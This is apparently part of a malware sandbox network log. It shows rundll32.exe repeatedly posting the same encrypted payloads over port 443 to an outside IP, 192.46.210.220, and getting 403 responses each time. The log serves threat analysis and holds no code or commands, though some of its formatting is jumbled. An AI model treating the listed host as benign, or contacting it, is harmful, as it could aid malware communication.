2021-10-28 03:07:49 UTC | 119 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
    Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:50 UTC | 129 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 03:07:50 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      25192.168.2.449884192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:07:49 UTC124OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
2021-10-28 03:07:50 UTC | 129 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:50 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 49892 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:53 UTC | 129 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:54 UTC | 139 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:54 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 27 | Source IP: 192.168.2.4 | Source Port: 49893 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:53 UTC | 134 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:54 UTC | 139 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:54 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 28 | Source IP: 192.168.2.4 | Source Port: 49900 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:57 UTC | 139 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:58 UTC | 149 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:58 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 29 | Source IP: 192.168.2.4 | Source Port: 49901 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:57 UTC | 144 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:58 UTC | 149 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:58 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49794 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:06 UTC | 14 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:07 UTC | 19 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:07 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 30 | Source IP: 192.168.2.4 | Source Port: 49913 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:01 UTC | 149 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:01 UTC | 159 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:01 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 31 | Source IP: 192.168.2.4 | Source Port: 49914 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:01 UTC | 154 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:02 UTC | 159 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:01 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 32 | Source IP: 192.168.2.4 | Source Port: 49921 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:05 UTC | 159 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:05 UTC | 169 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:05 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 33 | Source IP: 192.168.2.4 | Source Port: 49922 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:05 UTC | 164 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:05 UTC | 169 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:05 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 34 | Source IP: 192.168.2.4 | Source Port: 49929 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:08 UTC | 169 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:09 UTC | 179 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 35 | Source IP: 192.168.2.4 | Source Port: 49930 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:09 UTC | 174 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
                                                                                                      2021-10-28 03:08:09 UTC179INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:08:09 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


Session ID: 36 | Source IP: 192.168.2.4 | Source Port: 49938 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:12 UTC | 179 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:12 UTC | 179 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:13 UTC | 189 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:13 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 37 | Source IP: 192.168.2.4 | Source Port: 49939 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:12 UTC | 184 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:12 UTC | 184 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:13 UTC | 189 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:13 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 38 | Source IP: 192.168.2.4 | Source Port: 49946 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:16 UTC | 189 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:16 UTC | 189 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:17 UTC | 199 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:17 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 39 | Source IP: 192.168.2.4 | Source Port: 49947 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:16 UTC | 194 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:16 UTC | 194 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:17 UTC | 199 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:17 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49801 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:07:10 UTC | 19 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:07:10 UTC | 20 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:07:11 UTC | 29 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:07:10 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 40 | Source IP: 192.168.2.4 | Source Port: 49954 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:20 UTC | 199 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:20 UTC | 199 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:21 UTC | 209 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:20 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 41 | Source IP: 192.168.2.4 | Source Port: 49955 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:20 UTC | 204 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:20 UTC | 204 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:21 UTC | 209 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:21 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 42 | Source IP: 192.168.2.4 | Source Port: 49962 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:24 UTC | 209 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:24 UTC | 209 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:24 UTC | 219 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 43 | Source IP: 192.168.2.4 | Source Port: 49963 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:24 UTC | 214 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4853
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:24 UTC | 214 | OUT | Data Raw: 37 52 40 b0 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: 7R@$SYCkN#@QN`hB.h\-%ynG`3kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:25 UTC | 219 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:25 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 44 | Source IP: 192.168.2.4 | Source Port: 49973 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:28 UTC | 219 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4865
Connection: Close
Cache-Control: no-cache
2021-10-28 03:08:28 UTC | 219 | OUT | Data Raw: cc b6 10 bf 10 0b 24 a3 53 b2 59 a3 43 6b 4e 93 e6 ae 23 f9 a6 ad a5 40 51 1d da c9 df 00 c6 4e f5 f1 ef 60 68 05 8a b1 91 aa f0 bb 82 42 ca d8 fa ef 2e 68 c1 0d 1d 1a 5c 2d dd 0c 25 16 79 a5 6e fc 97 00 47 a0 60 95 0b eb dc 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
Data Ascii: $SYCkN#@QN`hB.h\-%ynG`3k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
2021-10-28 03:08:28 UTC | 229 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 03:08:28 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 45 | Source IP: 192.168.2.4 | Source Port: 49975 | Destination IP: 192.46.210.220 | Destination Port: 443 | Process: C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 03:08:28 UTC | 224 | OUT | POST / HTTP/1.1
